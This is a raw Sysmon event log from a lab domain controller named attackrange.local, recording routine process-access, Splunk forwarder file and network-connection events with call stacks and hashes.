10341000x80000000000000001695227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.332{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001695226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.192{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E23038A8E274D545B704895FF5C7D52F,SHA256=8773FA8E5F1D3D1CE78C2FFD6D0B94EE161C615DF793C1471972D0DA6146DDC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:03.801{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA64C6CEDAB082238B53BA47912BF4B8,SHA256=58A1DB96E1239DFBF90946FE5606C9A2D5B6E0F9E37E2904F595E26E511F5E37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:03.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC0153910578C1847E53CE0869FB826D,SHA256=5BF09F415CBDB25FBA326EC67CE5CC83A6DF2269418F70863E7062FE17926A97,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:54.971{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55110-false10.0.1.12-8089- 354300x80000000000000001695237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:54.533{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local51181- 23542300x80000000000000001695293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.832{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=390F94606535F9B8D5327F32E0061996,SHA256=A52E8EED063CD9AE544BF69BE718FD2AF9B1CF74DDA01EB661A0267CDA76ECB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.240{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A764C78A5FB6759D67BDE67794DC7C39,SHA256=E7907CABB74FBA625349CAA273388F849E9D0BAB3EEE0AF8EB74806E9A1C3206,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 